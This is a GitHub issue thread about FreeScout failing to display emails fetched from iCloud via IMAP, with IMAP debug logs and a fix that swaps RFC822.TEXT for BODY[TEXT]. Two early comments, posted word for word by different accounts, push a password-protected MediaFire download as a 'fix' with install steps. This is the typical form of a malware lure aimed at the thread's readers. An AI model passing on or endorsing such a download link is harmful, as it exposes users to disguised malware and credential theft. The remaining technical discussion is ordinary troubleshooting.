### ISSUE TITLE
Some emails blank when fetched from iCloud

### ISSUE THREAD

**Issue by ybizeul** [freescout-help-desk/freescout#4202] opened 2024-08-28 07:36 UTC
Many incoming emails are blank in the UI, sending samples now

PHP version: PHP 8.2.22
FreeScout version: 1.8.151
Database: MySQL / ~PostgreSQL~
Are you using CloudFlare: Yes / ~No~
Are you using non-official modules: Yes / ~No~

**Comment by ybizeul** [comment] 2024-08-28 07:37
I just saw 1.8.152 might address similar issues, hold on

**Comment by qiliq** [comment] 2024-08-28 07:40
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment] 2024-08-28 07:42
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by freescout-help** [comment] 2024-08-28 07:43
Fixed in FreeScout v1.8.152.

**Comment by ybizeul** [comment] 2024-08-28 08:10
Is there a way to clear `Message with such Message-ID has been fetched before: 935B5324-91C1-41E8-B873-0048AB45680F@tynsoe.org` so I can see if it fetches email correctly ?

I deleted it Freescout but it still sees it at something fetched before, I also cleared cache.

**Comment by ybizeul** [comment] 2024-08-28 08:23
Ok I found one that's not importing correctly, sent you an email

**Comment by freescout-help** [comment] 2024-08-28 08:26
> importing correctly

What do you mean? Can you attach some screenshots? Are you using POP3 or IMAP?

**Comment by ybizeul** [comment] 2024-08-28 08:29
It's just blank :

![image](https://github.com/user-attachments/assets/e0fac665-6472-4d09-a3c1-18fc2ab0ed04)

**Comment by freescout-help** [comment] 2024-08-28 08:30
We can't reproduce the issue on FreeScout v1.8.152

**Comment by freescout-help** [comment] 2024-08-28 08:43
Send a sample email to support@freescout.net but not EML file and not forwarding.

**Comment by ybizeul** [comment] 2024-08-28 09:08
I just sent the raw email content using `curl` to freescout support, hopefully it'll exhibit the issue.

> What do you mean? Can you attach some screenshots? Are you using POP3 or IMAP?
Not sure what's missing. I attached a screenshot, said it's IMAP

**Comment by freescout-help** [comment] 2024-08-28 09:12
Something is wrong with your email. Other email clients also can not show it properly:

![2024-08-28_12-10-46](https://github.com/user-attachments/assets/2190948f-b8a8-403f-8841-0dcead98cc15)

**Comment by ybizeul** [comment] 2024-08-28 09:15
Yes I guess i couldn't outsmart smtp when using curl to send it, but my mail client correctly parsed the original

**Comment by ybizeul** [comment] 2024-08-28 09:34
I just sent another one with correct content-type

**Comment by freescout-help** [comment] 2024-08-28 10:19
FreeScout v1.8.152 successfully fetched it:

![2024-08-28_13-18-19](https://github.com/user-attachments/assets/e42f55a4-45dd-4b9e-b31d-daacafec3801)

**Comment by ybizeul** [comment] 2024-08-28 12:58
It seems to be parsing Text Body, HTML Body, Date etc correctly.

Here is what I'm trying right now.

- Delete email in Freescout
- Delete reference in database
```
delete from threads where message_id='FR2P281MB29570501D66929BBC36BEFDB858B2@FR2P281MB2957.DEUP281.PROD.OUTLOOK.COM';
```
- Mark email as unread
- Fetch in System / Tools with debug.

What I'm getting :
```
[2024-08-28 14:36:31] Fetched: 1
[2024-08-28 14:36:31] 1) NAbox Help
[2024-08-28 14:36:32] Thread successfully created: 2268
[...]
>> TAG3 SELECT "NAbox"
<< * 554 EXISTS
<< * 0 RECENT
<< * OK [UNSEEN 549]
<< * OK [UIDVALIDITY 1659880285]
<< * OK [UIDNEXT 574]
<< * FLAGS (\Answered \Flagged \Draft \Deleted \Seen \Recent $MailFlagBit0 $MailFlagBit1 $MailFlagBit2 $Forwarded Redirected $NotJunk NotJunk)
<< * OK [PERMANENTFLAGS (\Answered \Flagged \Draft \Deleted \Seen \Recent $MailFlagBit0 $MailFlagBit1 $MailFlagBit2 $Forwarded Redirected $NotJunk NotJunk \*)]
<< TAG3 OK [READ-WRITE] SELECT completed (took 2 ms)
>> TAG4 UID SEARCH SINCE "25-Aug-2024" UNSEEN
<< * SEARCH 552
<< TAG4 OK SEARCH completed (took 5 ms)
>> TAG5 UID FETCH 552 (FLAGS)
<< * 549 FETCH (UID 552 FLAGS (\Answered))
<< TAG5 OK FETCH completed (took 4 ms)
>> TAG6 UID FETCH 552 (RFC822.HEADER)
<< * 549 FETCH (UID 552 RFC822.HEADER {12053}
[ Here, full headers of the email are displayed ]
<< TAG6 OK FETCH completed (took 36 ms)
>> TAG7 UID FETCH 552 (RFC822.TEXT)
<< * 549 FETCH (UID 552 RFC822.TEXT "")
<< TAG7 OK FETCH completed (took 181 ms)
```

Now, with an email that "works", doing the same thing, here goes :
```
>> TAG7 UID FETCH 574 (RFC822.TEXT)
<< * 555 FETCH (UID 574 RFC822.TEXT {3284}
<< 
<< --Apple-Mail=_ABE49CB5-3F28-4089-B773-D5B67CFE8374
<< Content-Transfer-Encoding: 7bit
<< Content-Type: text/plain;
```

It looks like I'm onto something right ? On the first email, the server seems to return an empty `RFC822.TEXT`, I'm not sure what `549` is compared to `555`

Finally, I enabled debug in Apple Mail on my side and looked at the trace. The mail is fetched with the following IMAP command I believe :

```
63.176 UID FETCH 575 (X-APPLE-REMOTE-LINKS BODYSTRUCTURE BODY.PEEK[])
* 556 FETCH (UID 575 MODSEQ (394336005050597) X-APPLE-REMOTE-LINKS () BODYSTRUCTURE (("text" "plain" NIL NIL NIL "7bit" 0 0 NIL NIL NIL NIL)("application" "pkcs7-signature" ("NAME" "smime.p7s") NIL NIL "base64" 2880 NIL ("ATTACHMENT" ("FILENAME" "smime.p7s")) NIL NIL) "signed" ("PROTOCOL" "application/pkcs7-signature" "BOUNDARY" "Apple-Mail=_35798986-B89C-42EA-A20B-B33563FC9AE7" "MICALG" "sha-256") NIL NIL NIL) BODY[] {7675}
```

From here I'm thinking, any way I can check and change `RFC822.TEXT` in Freescout to something else like `BODYSTRUCTURE` ?

**Comment by ybizeul** [comment] 2024-08-28 13:09
I changed the code to call `BODY[]` instead of

Now I'm getting this in the logs :
```
<< TAG6 OK FETCH completed (took 31 ms)
>> TAG7 UID FETCH 552 (BODY.PEEK[])
<< * 549 FETCH (UID 552 BODY[] {180700}
<< Return-path: <user.email@company.com>
<< Original-recipient: rfc822;help@nabox.org
<< Received: from p00-icloudmta-smtpin-us-west-1a-60-percent-20 by p154-mailgateway-smtp-7bf69f4fcc-hbc9r (mailgateway 2423B55)
[ Email content here ]
```

But still, the email is empty in Freescout UI :-(

**Comment by ybizeul** [comment] 2024-08-28 13:47
Ok, so using `BODY[TEXT]` instead of `RFC822.TEXT`, a previous email I never got to display does now show up correctly.

I'll let it sit for a few days and report if any side effect pops up

**Comment by freescout-help** [comment] 2024-08-28 18:09
Can you share the changes you've made in the code.

**Comment by ybizeul** [comment] 2024-08-28 20:29
```
        $result = $this->fetch(["$rfc.TEXT"], is_array($uids)?$uids:[$uids], null, $uid);
```

to

```
        $result = $this->fetch(["BODY[TEXT]"], is_array($uids)?$uids:[$uids], null, $uid);
```

From what I see, this method is called in two locations :
https://github.com/freescout-help-desk/freescout/blob/f218fe17d0148cbd2c67f903d66fd7d0b2e4aaa0/overrides/webklex/php-imap/src/Query/Query.php#L237
and
https://github.com/freescout-help-desk/freescout/blob/f218fe17d0148cbd2c67f903d66fd7d0b2e4aaa0/overrides/webklex/php-imap/src/Message.php#L498

And both are using `"RFC822"` parameter so there doesn't seem to a variable for this.

I commented on this exact issue here : https://github.com/Webklex/php-imap/issues/510

**Comment by freescout-help** [comment] 2024-08-29 05:19
Try with the attached `/overrides/webklex/php-imap/src/Connection/Protocols/ImapProtocol.php` file. 
It uses `BODY[TEXT]` if IMAP Server for the mailbox is set to `imap.mail.me.com`.

[ImapProtocol.zip](https://github.com/user-attachments/files/16792384/ImapProtocol.zip)

**Comment by ybizeul** [comment] 2024-08-29 07:38
```
<< * 549 FETCH (UID 552 BODY[TEXT] {168647}
```

Looking good !

**Comment by CoE2013** [comment] 2024-09-09 06:29
Same issue here, ALL mails do not show in GUI, thus body empty.
But in the DB it looks good at a first glance.

Error occurred about 1 week ago and persists even after updating system and all modules etc.
Mailserver is on Microsoft, thus O365 Inbox.

Any ideas?
We can not reply to tickets for about 1 week now.

In other mailclients, Mails are ok (and fully shown)

![Screenshot 2024-09-09 082715](https://github.com/user-attachments/assets/b39603c3-b0f7-427e-8b9e-6b2fc780a3f5)

**Comment by freescout-help** [comment] 2024-09-09 06:34
@CoE2013 Your issue is different as you have body in the DB. Create a new issue.

**Comment by mitchplze** [comment] 2024-09-12 00:17
I believe I'm having the same issue. Related at least.

Posted in #4219 ([deep link](https://github.com/freescout-help-desk/freescout/issues/4219#issuecomment-2345008548))

**Closed** 2024-09-22 14:01 UTC
